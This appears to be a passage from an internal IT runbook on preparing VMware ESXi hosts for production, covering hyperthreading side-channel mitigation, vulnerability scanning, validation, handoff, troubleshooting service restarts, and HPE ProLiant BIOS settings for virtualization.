Click on Configure > Advanced System Settings > Search for “VMkernel.Boot.HyperthreadingMitigation” > Edit > Search for “Restrict” > select “Enabled” > OK
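The same scheduler setting can also be toggled with PowerCLI; a hedged sketch (verify the exact advanced setting name on your ESXi build):

# Enables the side-channel-aware scheduler; takes effect after the next reboot
Get-VMHost -Name FLO-ESX05 | Get-AdvancedSetting -Name VMkernel.Boot.hyperthreadingMitigation |
    Set-AdvancedSetting -Value $true -Confirm:$false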

Scan for Vulnerabilities

⦁ Notify Information Security team to perform a risk assessment with a vulnerability scan.
⦁ Remediate any identified vulnerabilities.

Validate Machine Production Ready

⦁ Move one test VM to this new ESXi host to verify functionality (like login, ping from remote host…).

Set Host as Ready for production

⦁ Move the ESXi host to the proper cluster.
⦁ Notify Infrastructure team of the new ESXi host availability

Troubleshooting Section

⦁ Unable to connect via vSphere Client with this error:

Resolution: install the correct version of vSphere Client, or use the browser-based vSphere Client to connect to the ESXi host.

⦁ How to restart all services on ESXi without a reboot

services.sh restart

⦁ Restart host management agents

/etc/init.d/hostd restart
/etc/init.d/vpxa restart

HPE: Gen8 Bios Settings to Prepare Host for Virtualization Role

Proliant Gen8 Blade Servers

HP servers are often chosen as VMware & Hyper-V hosts. To further optimize these “pizza boxes” for their intended purposes, here are the steps to prep these things:

At cold boot, select the “System Options” menu > choose “Disabled” for each NIC’s “Network Boot” capability

“Power Management Options” menu > “HP Power Profile” > select “Maximum Performance”

“Power Management Options” menu > “Advanced Power Management Options” > select “Maximum Performance” for the “Memory Power Savings Mode”

Set the correct date and time in the “Date and Time” menu
 

“Advanced Options | Advanced System ROM Options” menu > select “Disabled” for the “Power-on Logo” option

“Advanced Options | Advanced Performance Tuning Options” menu > select “Enabled” for the “ACPI SLIT Preferences”

Also set “Intel Performance Counter Monitor (PCM)”

Proliant Gen9 / Gen10 Servers

⦁ For Synergy Blade Servers the BIOS settings are pre-configured in the Server Profile Template.
⦁ For HPE Synergy Blade servers, use the Composer to create a Server Profile using the ESXi template to apply it to the appropriate server hardware.
⦁ This screenshot provides the expected BIOS settings.